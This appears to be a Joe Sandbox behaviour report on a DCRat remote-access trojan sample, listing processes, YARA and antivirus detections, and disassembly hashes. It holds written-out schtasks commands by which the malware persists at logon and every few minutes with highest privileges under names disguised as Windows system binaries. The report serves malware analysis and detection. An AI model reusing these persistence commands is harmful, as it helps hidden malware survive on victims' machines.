Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 13 /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 6 /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 6 /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:46:54
Start date:	23/04/2024
Path:	C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe"
Imagebase:	0x710000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2043423134.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Users\Default\Links\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\Links\ApplicationFrameHost.exe
Imagebase:	0x420000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.2131167381.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.2131167381.000000000275F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Users\Default\Links\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\Links\ApplicationFrameHost.exe
Imagebase:	0x680000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.2080688928.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Program Files\Windows Mail\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Mail\ctfmon.exe"
Imagebase:	0xff0000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2185558862.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2185558862.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Program Files\Windows Mail\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Mail\ctfmon.exe"
Imagebase:	0xa70000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2180837076.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2180837076.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
Imagebase:	0xe30000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2175740771.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
Imagebase:	0x8b0000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2173207701.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2173207701.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Users\Public\AccountPictures\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\AccountPictures\RuntimeBroker.exe
Imagebase:	0x620000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2185833372.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2185833372.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Users\Public\AccountPictures\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\AccountPictures\RuntimeBroker.exe
Imagebase:	0x10000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2189636764.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
Imagebase:	0xbb0000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2189170513.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2189170513.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:46:55
Start date:	23/04/2024
Path:	C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
Imagebase:	0x1b0000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2186087124.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2186087124.000000000258F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:47:05
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
Imagebase:	0x930000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2233092169.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2233092169.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:47:14
Start date:	23/04/2024
Path:	C:\Program Files\Windows Mail\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Mail\ctfmon.exe"
Imagebase:	0xa60000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2295888940.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2295888940.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FF848F32085 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F3210B

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 3530a487715823c542b4786cd0a8c635bc64532efb846c1e461a1a69570a4471
Instruction ID: 99035629f53a7d4fd663738e2ac8bf255f9877cf64a66247d5c8e132a16a28f5
Opcode Fuzzy Hash: 3530a487715823c542b4786cd0a8c635bc64532efb846c1e461a1a69570a4471
Instruction Fuzzy Hash: E8411231A0DA4A4FE346FB7898491B8BBE1EF85391F0544BBD40DC71E2DF28A8458355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 0786169f0d9bd3b381708bff8f010dd587c2b36b4c0ccaa1512bb77c0e260a3a
Instruction ID: dfa23edcce8a90cf36130e78a6379e385947df732347d724be7fe2aadc76be3d
Opcode Fuzzy Hash: 0786169f0d9bd3b381708bff8f010dd587c2b36b4c0ccaa1512bb77c0e260a3a
Instruction Fuzzy Hash: 57116A31D0954E9FEB80FB68D8492BD7BE0FF98380F4045B7D809C6192EF38A5448700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F311FD

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 41914be16aecf2e6f3958c4e0cccf7830c30f66a2994a49ec7e494bdda2cd425
Instruction ID: ed51e1004c1d5ef38c981e0f173e24710c06b8e9206562c8baa798964437d6eb
Opcode Fuzzy Hash: 41914be16aecf2e6f3958c4e0cccf7830c30f66a2994a49ec7e494bdda2cd425
Instruction Fuzzy Hash: 8811BF70D0C64A8FEB5AFB6488692F97BE0FF59341F1404BFD40AD61D1EB285580C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F311A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F311FD

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9619e6b3be7d06d8e08f29bb2ed19894469f09d1310db910c94a0a2bb3345006
Instruction ID: d24fa57917b696d3540fadcb2b8ae9104da35ce644bd11b784db3c43e7b21b37
Opcode Fuzzy Hash: 9619e6b3be7d06d8e08f29bb2ed19894469f09d1310db910c94a0a2bb3345006
Instruction Fuzzy Hash: 3BF0F070E1CA4E8EFB99BBA498193FA7BE8FF55345F00147BE41AD20C0EF3856948654

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F316A8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b6f37d601e0b8fa826dcbbdaa0732e42646182229add44b9452086f680fcb7
Instruction ID: 4f83665cb12cabb94c0d36a1d8353e444b12f8179f5c41426c50eccbd4eb6dd3
Opcode Fuzzy Hash: 44b6f37d601e0b8fa826dcbbdaa0732e42646182229add44b9452086f680fcb7
Instruction Fuzzy Hash: BE91BD31A0CA4A8FDB58EF1898515B977E2FF99744F14057AE44DC32C2CE34AC82C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F335FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 946ee77b3b3360e62a5445b688a03a1c08390480d4c1d4d3931727ec1bad3ae8
Instruction ID: aa60ca5ed094ce3246ede15e78b39124722ab3c2e5b87c7a0be14b45f43fb408
Opcode Fuzzy Hash: 946ee77b3b3360e62a5445b688a03a1c08390480d4c1d4d3931727ec1bad3ae8
Instruction Fuzzy Hash: C6718C31E1894A8FE794EB6CE8167A9BBE1FB99350F50417AC00DD32CADFA81905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043926271.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_B9exXW7c3t.jbxd

Similarity

API ID:
String ID:
API String ID:
